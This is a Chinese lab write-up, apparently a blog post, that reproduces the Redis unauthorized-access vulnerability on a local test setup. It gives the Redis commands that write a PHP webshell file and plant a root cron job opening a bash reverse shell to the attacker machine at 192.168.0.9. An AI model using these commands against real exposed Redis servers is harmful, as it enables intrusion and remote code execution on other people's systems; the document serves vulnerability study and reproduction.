Redis未授权访问4.x/5.x漏洞复现

Redis未授权访问漏洞原理

Redis在默认安装情况下,默认端口为6379;如果在配置的时候配置不当,没有添加过防火墙信任规则,修改默认端口等防护策略;使得直接暴露公网 并没有密码策略,使得任何用户都可以直接访问Redis。(利用条件:root权限、写入webshell(绝对路径))

vulhub搭建存在权限不是 root运行,看了很多文章还不知道怎么解决】

配置centos环境安装Redis

客户机【192.168.0.3】
攻击机【192.168.0.9】

官网下载3.2.9安装包

  1. wget http: / / download.redis.io/ releases/redis- 3.2.9.tar. gz
    请添加图片描述

  2. 解压下载的压缩包
    root@centos] # tar - zxvf redis-3.2.9.tar.gzredis-3.2.9 /
    请添加图片描述

  3. 进入解压后的文件
    执行make & make install
    请添加图片描述

    如果报错,可能是没安装gcc ,执行yum install gcc

  4. 更改下Redis配置文件redis.conf

    配置允许可以远程访问:在bind前面注释!并将protected-mode设置为no
    在这里插入图片描述

  5. 启动:redis- server redis.conf;
    在这里插入图片描述

  6. 未授权访问
    在攻击机nmap 192.168.0.3 -p 6379
    在这里插入图片描述
    查看Redis版本等信息
    在这里插入图片描述
    连接Redis未授权

攻击机需要安装连接工具:redis-cli
wget http://download.redis.io/releases/redis-5.0.7.tar.gz
tar xzf redis-5.0.7.tar.gz
make
cd /src

./ redis-cli -h 192.168.0.3

在这里插入图片描述

一:写入一句话木马

前提条件:root权限、知道绝对路径

config set dir /var/www/html
config set dbfilename test.php
set xxx "\n\n\n<?phpinfo();?>\n\n\n"
save

在这里插入图片描述
返回客户机查看一下是不是插入进去

在这里插入图片描述

二:反弹shell

1.开启nc,监听9999端口

nc -lvnp 9999

在这里插入图片描述
2.在客户机Redis里创建定时任务

set x "\n* * * * bash -i >& /dev/tcp/192.168.0.9/9999 0>&1\n"

config set dir /var/spool/cron/
config set dbfilename root
save

请添加图片描述
3.等待一分钟返回nc反弹
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值